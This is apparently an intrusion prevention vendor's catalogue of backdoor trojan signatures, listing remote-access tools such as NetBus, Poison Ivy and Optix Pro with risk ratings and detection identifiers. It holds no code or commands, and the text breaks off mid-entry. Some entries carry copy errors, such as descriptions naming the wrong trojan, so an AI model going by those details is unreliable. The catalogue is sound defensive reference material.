Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Backdoor

Description:

Lithium is a trojan horse program that provides a backdoor to the infected system. The backdoor allows a remote attacker to control the backdoored system via a specific client program.

Situation:

BD-TCP_Lithium

References:

CVE-1999-0660
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0660

Backdoor-M2-Trojan

About this vulnerability:	Backdoor M2 Trojan activity
Risk:	High
First detected in:	sgpkg-ips-8-1102
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	M2 Trojan
Type:	Backdoor
Description:	M2 Trojan is a trojan horse program that provides a backdoor to the infected system. The backdoor allows a remote attacker to control the backdoored system via a specific client program.
Situation:	BD-TCP_M2-Trojan-Response

Backdoor-Mantis

About this vulnerability:	Backdoor Mantis activity
Risk:	High
First detected in:	sgpkg-ips-8-1102
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	Mantis
Type:	Backdoor
Description:	Mantis backdoor allows a remote attacker to control the infected system.
Situation:	BD-TCP_Mantis-Response

Backdoor-Massaker

About this vulnerability:	Backdoor Massaker activity
Risk:	High
First detected in:	sgpkg-ips-8-1102
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	Massaker
Type:	Backdoor
Description:	Massaker is a trojan horse program that provides a backdoor to the infected system. The backdoor allows a remote attacker to control the backdoored system via a specific client program.
Situation:	BD-TCP_Massaker-Response

Backdoor-Masters-Of-Paradise

About this vulnerability:

Masters Of Paradise backdoor

Risk:

High

First detected in:

sgpkg-ips-255-3038

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Backdoor

Description:

Masters of paradise is a trojan horse program that provides a backdoor to the infected system. The backdoor allows a remote attacker to control the backdoored system via a specific client program.

Situation:

BD-TCP_Masters-Of-Paradise

References:

CVE-1999-0660
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0660

Backdoor-Mavericks-Matrix

About this vulnerability:	Backdoor Maverick's Matrix activity
Risk:	High
First detected in:	sgpkg-ips-8-1102
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows 95; Windows 98
Software:	Mavericks Matrix
Type:	Backdoor
Description:	Maverick's Matrix backdoor allows a remote attacker to control the infected system via a specific client program.
Situation:	BD-TCP_Mavericks-Matrix-Response

Backdoor-Meet-The-Lamer

About this vulnerability:

Meet-The-Lamer backdoor

Risk:

High

First detected in:

sgpkg-ips-255-3038

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Backdoor

Description:

Meet The Lamer is a trojan horse program that provides a backdoor to the infected system. The backdoor allows a remote attacker to control the backdoored system via a specific client program.

Situation:

BD-TCP_Meet-The-Lamer

References:

CVE-1999-0660
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0660

Backdoor-Michal

About this vulnerability:	Backdoor Michal activity
Risk:	High
First detected in:	sgpkg-ips-8-1102
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	Michal
Type:	Backdoor
Description:	Michal is a trojan horse program that provides a backdoor to the infected system. The backdoor allows a remote attacker to control the backdoored system via a specific client program.
Situation:	BD-TCP_Michal-Response

Backdoor-Microspy

About this vulnerability:

Microspy backdoor

Risk:

High

First detected in:

sgpkg-ips-255-3038

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Backdoor

Description:

Microspy is a trojan horse program that provides a backdoor to the infected system. The backdoor allows a remote attacker to control the backdoored system via a specific client program.

Situation:

BD-TCP_Microspy

References:

CVE-1999-0660
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0660

Backdoor-Millenium

About this vulnerability:	Backdoor Millenium activity
Risk:	High
First detected in:	sgpkg-ips-8-1102
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	Millenium
Type:	Backdoor
Description:	Millenium backdoor allows a remote attacker to control the infected system.
Situation:	BD-TCP_Millenium-Response

Backdoor-Mini-Oblivion

About this vulnerability:	Backdoor Mini Oblivion activity
Risk:	High
First detected in:	sgpkg-ips-8-1102
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	Mini Oblivion
Type:	Backdoor
Description:	Mini Oblivion is a trojan horse program that provides a backdoor to the infected system. The backdoor allows a remote attacker to control the backdoored system via a specific client program.
Situation:	BD-TCP_Mini-Oblivion-Response

Backdoor-Mneah

About this vulnerability:	Mneah backdoor activity
Risk:	High
First detected in:	sgpkg-ips-11-1102
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	Mneah
Type:	Backdoor
Description:	Mneah is a trojan horse program that provides a backdoor to the infected system. The backdoor allows a remote attacker to control the backdoored system via a specific client program.
Situation:	BD-TCP_Mneah-Response

Backdoor-Moonpie

About this vulnerability:	Backdoor Moonpie activity
Risk:	High
First detected in:	sgpkg-ips-8-1102
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	Moonpie
Type:	Backdoor
Description:	Moonpie is a trojan horse program that provides a backdoor to the infected system. The backdoor allows a remote attacker to control the backdoored system via a specific client program.
Situation:	BD-TCP_Moonpie-Response

Backdoor-Mosucker

About this vulnerability:	Backdoor Mosucker activity
Risk:	High
First detected in:	sgpkg-ips-8-1102
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows 95; Windows 98
Software:	Mosucker
Type:	Backdoor
Description:	Mosucker is a trojan horse program that provides a backdoor to the infected system. The backdoor allows a remote attacker to control the backdoored system via a specific client program.
Situation:	BD-TCP_Mosucker-Response

Backdoor-Net-Administrator

About this vulnerability:

Net Administrator backdoor

Risk:

High

First detected in:

sgpkg-ips-255-3038

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Backdoor

Description:

NoSecure is a trojan horse program that provides a backdoor to the infected system. The backdoor allows a remote attacker to control the backdoored system via a specific client program.

Situation:

BD-TCP_Net-Administrator

References:

CVE-1999-0660
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0660

Backdoor-Net-Devil

About this vulnerability:	Backdoor Net-Devil activity
Risk:	High
First detected in:	sgpkg-ips-8-1102
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	Net-Devil
Type:	Backdoor
Description:	Net-Devil is a trojan horse program that provides a backdoor to the infected system. The backdoor allows a remote attacker to control the backdoored system via a specific client program.
Situation:	BD-TCP_Net-Devil-Response

Backdoor-Net-Metropolitan

About this vulnerability:

Net Metropolitan backdoor

Risk:

High

First detected in:

sgpkg-ips-255-3038

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Backdoor

Description:

Net Metropolitan is a trojan horse program that provides a backdoor to the infected system. The backdoor allows a remote attacker to control the backdoored system via a specific client program.

Situation:

BD-TCP_Net-Metropolitan
BD-TCP_Net-Metropolitan-Reply

References:

CVE-1999-0660
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0660

Backdoor-Net-Taxi

About this vulnerability:	Net Taxi backdoor activity
Risk:	High
First detected in:	sgpkg-ips-11-1102
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	Net Taxi
Type:	Backdoor
Description:	Net Taxi is a trojan horse program that provides a backdoor to the infected system. The backdoor allows a remote attacker to control the backdoored system via a specific client program.
Situation:	BD-TCP_Net-Taxi-Response

Backdoor-NetBus

About this vulnerability:	Backdoor NetBus activity
Risk:	High
First detected in:	sgpkg-ips-8-1102
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	NetBus
Type:	Backdoor
Description:	NetBus is a trojan horse program that provides a backdoor to the infected system. The backdoor allows a remote attacker to control the backdoored system via a specific client program.
Situation:	BD-TCP_NetBus-Response

Backdoor-NetBus-Pro

About this vulnerability:	Backdoor NetBus Pro activity
Risk:	High
First detected in:	sgpkg-ips-8-1102
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	NetBus
Type:	Backdoor
Description:	NetBus Pro backdoor allows a remote attacker to control the infected system via a specific client program.
Situation:	BD-TCP_NetBus-Pro-Request BD-TCP_NetBus-Pro-Response

Backdoor-Netcontroller

About this vulnerability:

Netcontroller backdoor

Risk:

High

First detected in:

sgpkg-ips-255-3038

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Backdoor

Description:

Netcontroller is a trojan horse program that provides a backdoor to the infected system. The backdoor allows a remote attacker to control the backdoored system via a specific client program.

Situation:

BD-TCP_Netcontroller

References:

CVE-1999-0660
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0660

Backdoor-Netraider

About this vulnerability:	Backdoor Netraider activity
Risk:	High
First detected in:	sgpkg-ips-9-1102
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	Netraider
Type:	Backdoor
Description:	Netraider is a trojan horse program that provides a backdoor to the infected system. The backdoor allows a remote attacker to control the backdoored system via a specific client program.
Situation:	BD-TCP_Netraider-Response

Backdoor-NetSphere

About this vulnerability:	Backdoor NetSphere activity
Risk:	High
First detected in:	sgpkg-ips-8-1102
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows 95; Windows 98; Windows NT
Software:	NetSphere
Type:	Backdoor
Description:	NetSphere backdoor allows a remote attacker to control the infected system via a specific client program.
Situation:	BD-TCP_NetSphere-Response

Backdoor-NetSpy

About this vulnerability:	Backdoor NetSpy activity
Risk:	High
First detected in:	sgpkg-ips-8-1102
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows 95; Windows 98
Software:	NetSpy
Type:	Backdoor
Description:	NetSpy backdoor allows a remote attacker to control the infected system via a specific client program.
Situation:	BD-TCP_NetSpy-Response

Backdoor-Network-Terrorist

About this vulnerability:	Backdoor Network Terrorist activity
Risk:	High
First detected in:	sgpkg-ips-8-1102
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	Network Terrorist
Type:	Backdoor
Description:	Network Terrorist is a trojan horse program that provides a backdoor to the infected system. The backdoor allows a remote attacker to control the backdoored system via a specific client program.
Situation:	BD-TCP_Network-Terrorist-Response

Backdoor-New-Silencer

About this vulnerability:	New Silencer backdoor activity
Risk:	High
First detected in:	sgpkg-ips-11-1102
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	New Silencer
Type:	Backdoor
Description:	New Silencer is a trojan horse program that provides a backdoor to the infected system. The backdoor allows a remote attacker to control the backdoored system via a specific client program.
Situation:	BD-TCP_New-Silencer-Response

Backdoor-Nirvana

About this vulnerability:

Nirvana backdoor

Risk:

High

First detected in:

sgpkg-ips-255-3038

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Backdoor

Description:

NoSecure is a trojan horse program that provides a backdoor to the infected system. The backdoor allows a remote attacker to control the backdoored system via a specific client program.

Situation:

BD-TCP_Nirvana

References:

CVE-1999-0660
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0660

Backdoor-NokNok

About this vulnerability:	NokNok backdoor activity
Risk:	High
First detected in:	sgpkg-ips-11-1102
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	NokNok
Type:	Backdoor
Description:	NokNok is a trojan horse program that provides a backdoor to the infected system. The backdoor allows a remote attacker to control the backdoored system via a specific client program.
Situation:	BD-TCP_NokNok-Response

Backdoor-NoSecure

About this vulnerability:

NoSecure backdoor

Risk:

High

First detected in:

sgpkg-ips-254-3038

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Backdoor

Description:

NoSecure is a trojan horse program that provides a backdoor to the infected system. The backdoor allows a remote attacker to control the backdoored system via a specific client program.

Situation:

BD-TCP_NoSecure

References:

CVE-1999-0660
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0660

Backdoor-Oblivion

About this vulnerability:	Backdoor Oblivion activity
Risk:	High
First detected in:	sgpkg-ips-8-1102
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	Oblivion
Type:	Backdoor
Description:	Oblivion is a trojan horse program that provides a backdoor to the infected system. The backdoor allows a remote attacker to control the backdoored system via a specific client program.
Situation:	BD-TCP_Oblivion-Response

Backdoor-Olive

About this vulnerability:

Pitfall Surprise backdoor

Risk:

High

First detected in:

sgpkg-ips-254-3038

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Backdoor

Description:

Olive is a trojan horse program that provides a backdoor to the infected system. The backdoor allows a remote attacker to control the backdoored system via a specific client program.

Situation:

BD-TCP_Olive-Response
BD-TCP_Oiris-Banner

References:

CVE-1999-0660
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0660

Backdoor-One

About this vulnerability:	Backdoor One activity
Risk:	High
First detected in:	sgpkg-ips-8-1102
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	<os>
Type:	Backdoor
Description:	One is a trojan horse program that provides a backdoor to the infected system. The backdoor allows a remote attacker to control the backdoored system via a specific client program.
Situation:	BD-TCP_One-Response

Backdoor-OOTLT

About this vulnerability:

OOTLT backdoor

Risk:

High

First detected in:

sgpkg-ips-254-3038

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Backdoor

Description:

OOTLT is a trojan horse program that provides a backdoor to the infected system. The backdoor allows a remote attacker to control the backdoored system via a specific client program.

Situation:

BD-TCP_PC-OOTLT

References:

CVE-1999-0660
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0660

Backdoor-Optix-Pro

About this vulnerability:	Backdoor Optix Pro activity
Risk:	High
First detected in:	sgpkg-ips-8-1102
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	Optix-Pro
Type:	Backdoor
Description:	Optix Pro is a trojan horse program that provides a backdoor to the infected system. The backdoor allows a remote attacker to control the backdoored system via a specific client program.
Situation:	BD-TCP_Optix-Pro-Response

Backdoor-Oxon

About this vulnerability:

Oxon backdoor

Risk:

High

First detected in:

sgpkg-ips-253-3038

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Backdoor

Description:

Oxon is a trojan horse program that provides a backdoor to the infected system. The backdoor allows a remote attacker to control the backdoored system via a specific client program.

Situation:

BD-TCP_PC-Oxon

References:

CVE-1999-0660
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0660

Backdoor-PC-Invader

About this vulnerability:

PC Invader backdoor

Risk:

High

First detected in:

sgpkg-ips-253-3038

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Backdoor

Description:

PC Invader is a trojan horse program that provides a backdoor to the infected system. The backdoor allows a remote attacker to control the backdoored system via a specific client program.

Situation:

BD-TCP_PC-Invader
BD-TCP_PC-Invader-Banner

References:

CVE-1999-0660
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0660

Backdoor-Phase-Zero

About this vulnerability:	Backdoor Phase Zero activity
Risk:	High
First detected in:	sgpkg-ips-9-1102
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows 95; Windows 98; Windows NT
Software:	Phase Zero
Type:	Backdoor
Description:	Phase Zero backdoor allows a remote attacker to control the infected system via a specific client program.
Situation:	BD-TCP_Phase-Zero-Response

Backdoor-Phoenix

About this vulnerability:	Phoenix backdoor activity
Risk:	High
First detected in:	sgpkg-ips-9-1102
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	Phoenix
Type:	Backdoor
Description:	Phoenix backdoor allows a remote attacker to control the infected system via a specific client program.
Situation:	BD-TCP_Phoenix-Response

Backdoor-PitFall

About this vulnerability:	PitFall backdoor activity
Risk:	High
First detected in:	sgpkg-ips-9-1102
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	PitFall
Type:	Backdoor
Description:	PitFall backdoor allows a remote attacker to control the infected system via a specific client program.
Situation:	BD-TCP_PitFall-Response

Backdoor-Pitfall-Surprise

About this vulnerability:

Pitfall Surprise backdoor

Risk:

High

First detected in:

sgpkg-ips-253-3038

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Backdoor

Description:

Pitfall Surprise is a trojan horse program that provides a backdoor to the infected system. The backdoor allows a remote attacker to control the backdoored system via a specific client program.

Situation:

BD-TCP_Pitfall-Surprise

References:

CVE-1999-0660
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0660

Backdoor-Poison-Ivy

About this vulnerability:	Poison Ivy backdoor
Risk:	High
First detected in:	sgpkg-ips-305-4219
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	<os>
Type:	Backdoor
Description:	Poison Ivy is a Trojan Horse program, which can be used to bypass normal security mechanisms to secretly control and steal data from an infected computer. Infected computers are subject to a variety of remote control functionality, ranging from remote administration to surveillance.
Situation:	Shared_SS-Poison-Ivy-Traffic Datalength-TCP_Poison-Ivy-Traffic

Backdoor-Priority

About this vulnerability:

Priority backdoor

Risk:

High

First detected in:

sgpkg-ips-253-3038

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Backdoor

Description:

Priority is a trojan horse program that provides a backdoor to the infected system. The backdoor allows a remote attacker to control the backdoored system via a specific client program.

Situation:

BD-TCP_Priority

References:

CVE-1999-0660
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0660

Backdoor-Private-Port

About this vulnerability:

Private Port backdoor

Risk:

High

First detected in:

sgpkg-ips-253-3038

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Backdoor

Description:

Private Port is a trojan horse program that provides a backdoor to the infected system. The backdoor allows a remote attacker to control the backdoored system via a specific client program.

Situation:

BD-TCP_Private-Port

References:

CVE-1999-0660
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0660

Backdoor-Progenic

About this vulnerability:

Progenic backdoor

Risk:

High

First detected in:

sgpkg-ips-253-3038

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Backdoor

Description:

Progenic is a trojan horse program that provides a backdoor to the infected system. The backdoor allows a remote attacker to control the backdoored system via a specific client program.

Situation:

BD-TCP_Progenic

References:

CVE-1999-0660
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0660

Backdoor-Project-Next

About this vulnerability:	Project nEXT backdoor activity
Risk:	High
First detected in:	sgpkg-ips-9-1102
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	<os>
Type:	Backdoor
Description:	Project nEXT is a trojan horse program that provides a backdoor to the infected system. The backdoor allows a remote attacker to control the backdoored system via a specific client program.
Situation:	BD-TCP_Project-Next-Response

Backdoor-Prosiak

About this vulnerability:	Prosiak backdoor activity
Risk:	High
First detected in:	sgpkg-ips-9-1102
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	Prosiak
Type:	Backdoor
Description:	Prosiak backdoor allows a remote attacker to control the infected system via a specific client program.
Situation:	BD-TCP_Prosiak-Response

Backdoor-PsychWard

About this vulnerability:	PsychWard backdoor activity
Risk:	High
First detected in:	sgpkg-ips-9-1102
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	PsychWard
Type:	Backdoor
Description:	PsychWard is a trojan horse program that provides a backdoor to the infected system. The backdoor allows a remote attacker to control the backdoored system via a specific client program.
Situation:	BD-TCP_PsychWard-Response

Backdoor-Qwertos-RAT

About this vulnerability:

Qwertos Rat backdoor

Risk:

High

First detected in:

sgpkg-ips-253-3038

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Backdoor

Description:

Qwertos RAT is a trojan horse program that provides a backdoor to the infected system. The backdoor allows a remote attacker to control the backdoored system via a specific client program.

Situation:

BD-TCP_Qwertos-RAT

References:

CVE-1999-0660
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0660

Backdoor-R0Xr4t

About this vulnerability:	R0Xr4t backdoor activity
Risk:	High
First detected in:	sgpkg-ips-9-1102
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	R0Xr4t
Type:	Backdoor
Description:	R0Xr4t is a trojan horse program that provides a backdoor to the infected system. The backdoor allows a remote attacker to control the backdoored system via a specific client program.
Situation:	BD-TCP_R0Xr4t-Response

Backdoor-R3CServer

About this vulnerability:

R3CServer backdoor

Risk:

High

First detected in:

sgpkg-ips-253-3038

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Backdoor

Description:

R3CServer is a trojan horse program that provides a backdoor to the infected system. The backdoor allows a remote attacker to control the backdoored system via a specific client program.

Situation:

BD-TCP_R3CServer

References:

CVE-1999-0660
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0660

Backdoor-RaTHeaD

About this vulnerability:	RaTHeaD backdoor activity
Risk:	High
First detected in:	sgpkg-ips-9-1102
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	RaTHeaD
Type:	Backdoor
Description:	RaTHeaD backdoor allows a remote attacker to control the infected system.
Situation:	BD-TCP_RaTHeaD-Response

Backdoor-Remote-Boot-Tool

About this vulnerability:	Remote Boot Tool backdoor activity
Risk:	High
First detected in:	sgpkg-ips-9-1102
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	Remote Boot Tool
Type:	Backdoor
Description:	Remote Boot Tool backdoor allows a remote attacker to control the infected system.
Situation:	BD-UDP_Remote-Boot-Tool-Response

Backdoor-Remote-Hack

About this vulnerability:	Remote Hack backdoor activity
Risk:	High
First detected in:	sgpkg-ips-9-1102
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	Remote Hack
Type:	Backdoor
Description:	Remote Hack is a trojan horse program that provides a backdoor to the infected system. The backdoor allows a remote attacker to control the backdoored system via a specific client program.
Situation:	BD-TCP_Remote-Hack BD-TCP_Remote-Hack-Response

Backdoor-Remote-Process-Monitor

About this vulnerability:	Remote Process Monitor backdoor activity
Risk:	High
First detected in:	sgpkg-ips-9-1102
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	Remote Process Monitor
Type:	Backdoor
Description:	Remote Process Monitor backdoor allows a remote attacker to control the infected system.
Situation:	BD-TCP_Remote-Process-Monitor-Response

Backdoor-Remote-Revise

About this vulnerability:

Remote Revise backdoor

Risk:

High

First detected in:

sgpkg-ips-251-3038

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Backdoor

Description:

Remote Revise is a trojan horse program that provides a backdoor to the infected system. The backdoor allows a remote attacker to control the backdoored system via a specific client program.

Situation:

BD-TCP_Remote-Revise

References:

CVE-1999-0660
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0660

Backdoor-Revenger

About this vulnerability:	Revenger backdoor activity
Risk:	High
First detected in:	sgpkg-ips-9-1102
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	Revenger
Type:	Backdoor
Description:	Revenger is a trojan horse program that provides a backdoor to the infected system. The backdoor allows a remote attacker to control the backdoored system via a specific client program.
Situation:	BD-UDP_Revenger-Response

Backdoor-Ripperz-Controller

About this vulnerability:

Ripperz Controller backdoor

Risk:

High

First detected in:

sgpkg-ips-251-3038

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Backdoor

Description:

Ripperz Controller is a trojan horse program that provides a backdoor to the infected system. The backdoor allows a remote attacker to control the backdoored system via a specific client program.

Situation:

BD-TCP_Ripperz-Controller

References:

CVE-1999-0660
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0660

Backdoor-Ruler

About this vulnerability:	Ruler backdoor activity
Risk:	High
First detected in:	sgpkg-ips-9-1102
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	Ruler
Type:	Backdoor
Description:	Ruler is a trojan horse program that provides a backdoor to the infected system. The backdoor allows a remote attacker to control the backdoored system via a specific client program.
Situation:	BD-TCP_Ruler-Response

Backdoor-Satans

About this vulnerability:	Satans backdoor activity
Risk:	High
First detected in:	sgpkg-ips-9-1102
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows 95; Windows 98; Windows NT
Software:	Satans
Type:	Backdoor
Description:	Satans backdoor allows a remote attacker to control the infected system.
Situation:	BD-TCP_Satans-Response

Backdoor-Scarab

About this vulnerability:	Scarab backdoor activity
Risk:	High
First detected in:	sgpkg-ips-9-1102
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	Scarab
Type:	Backdoor
Description:	Scarab is a trojan horse program that provides a backdoor to the infected system. The backdoor allows a remote attacker to control the backdoored system via a specific client program.
Situation:	BD-TCP_Scarab-Response

Backdoor-Schneckenkorn

About this vulnerability:	Schneckenkorn backdoor activity
Risk:	High
First detected in:	sgpkg-ips-9-1102
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	Schneckenkorn
Type:	Backdoor
Description:	Schneckenkorn is a trojan horse program that provides a backdoor to the infected system. The backdoor allows a remote attacker to control the backdoored system via a specific client program.
Situation:	BD-TCP_Schneckenkorn-Response

Backdoor-Script-Serv-U-FTP-User-CVE-2021-35211

About this vulnerability:

An attempt to execute a backdoor of CVE-2021-35211 detected

Risk:

High

First detected in:

sgpkg-ips-1373-5242

Last changed:

sgpkg-ips-1373-5242

Platform:

Windows

Software:

<os>

Type:

Backdoor

Description:

An attempt to execute a backdoor of CVE-2021-35211 detected

Situation:

File-Text_Backdoor-Script-Serv-U-FTP-User-CVE-2021-35211

References:

CVE-2021-35211
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-35211

Backdoor-Tcc-Trojan

About this vulnerability:

Tcc Trojan backdoor

Risk:

High

First detected in:

sgpkg-ips-250-3038

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Backdoor

Description:

Tcc is a trojan horse program that provides a backdoor to the infected system. The backdoor allows a remote attacker to control the backdoored system via a specific client program.

Situation:

BD-TCP_Tcc-Trojan-Request

References:

CVE-1999-0660
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0660

Backdoor-The-Prayer

About this vulnerability:	The Prayer backdoor activity
Risk:	High
First detected in:	sgpkg-ips-9-1102
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	The Prayer
Type:	Backdoor
Description:	The Prayer backdoor allows a remote attacker to control the infected system via a specific client program.
Situation:	BD-TCP_The-Prayer-Response

Backdoor-The-Thing

About this vulnerability:	The Thing backdoor activity
Risk:	High
First detected in:	sgpkg-ips-9-1102
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	The Thing
Type:	Backdoor
Description:	The Thing is a trojan horse program that provides a backdoor to the infected system. The backdoor allows a remote attacker to control the backdoored system via a specific client program.
Situation:	X11_ThetHing-Backdoor-Banner X11_ThetHing-Backdoor-Connected BD-TCP_The-Thing-Response

Backdoor-The-Unexplained

About this vulnerability:	The Unexplained backdoor activity
Risk:	High
First detected in:	sgpkg-ips-9-1102
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows 95; Windows 98; Windows NT
Software:	The Unexplained
Type:	Backdoor
Description:	The Unexplained backdoor allows a remote attacker to control the infected system via a specific client program.
Situation:	BD-UDP_The-Unexplained-Response

Backdoor-Total-Solar-Eclypse

About this vulnerability:	Backdoor Total Solar Eclypse activity
Risk:	High
First detected in:	sgpkg-ips-8-1102
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows 95; Windows 98
Software:	Total Solar Eclypse
Type:	Backdoor
Description:	The Total Solar Eclypse backdoor allows a remote attacker to upload files to an infected system by using a built-in FTP server.
Situation:	BD-TCP_Total-Solar-Eclypse-Response

Backdoor-TransScout

About this vulnerability:

TransScout backdoor

Risk:

High

First detected in:

sgpkg-ips-250-3038

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Backdoor

Description:

TransScout is a trojan horse program that provides a backdoor to the infected system. The backdoor allows a remote attacker to control the backdoored system via a specific client program.

Situation:

BD-TCP_TransScout-Request
BD-TCP_RUX-The-Tick

References:

CVE-1999-0660
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0660

Backdoor-Trojan-Cow

About this vulnerability:

Trojan Cow backdoor

Risk:

High

First detected in:

sgpkg-ips-250-3038

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Backdoor

Description:

Cow is a trojan horse program that provides a backdoor to the infected system. The backdoor allows a remote attacker to control the backdoored system via a specific client program.

Situation:

BD-TCP_Cow-Trojan-Request

References:

CVE-1999-0660
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0660

Backdoor-Tron

About this vulnerability:	Tron backdoor activity
Risk:	High
First detected in:	sgpkg-ips-11-1102
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	Tron
Type:	Backdoor
Description:	Tron is a trojan horse program that provides a backdoor to the infected system. The backdoor allows a remote attacker to control the backdoored system via a specific client program.
Situation:	BD-TCP_Tron-Response

Backdoor-Truva

About this vulnerability:

Truva backdoor

Risk:

High

First detected in:

sgpkg-ips-250-3038

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Backdoor

Description:

Truva is a trojan horse program that provides a backdoor to the infected system. The backdoor allows a remote attacker to control the backdoored system via a specific client program.

Situation:

Telnet_Truva-Response

References:

CVE-1999-0660
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0660

Backdoor-Ullysse

About this vulnerability:	Ullysse backdoor
Risk:	High
First detected in:	sgpkg-ips-250-3038
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	<os>
Type:	Backdoor
Description:	Ullysse is a trojan horse program that provides a backdoor to the infected system. The backdoor allows a remote attacker to control the backdoored system via a specific client program.
Situation:	BD-TCP_Ullysse-Request

Backdoor-UltimateRAT

About this vulnerability:	UltimateRAT backdoor
Risk:	High
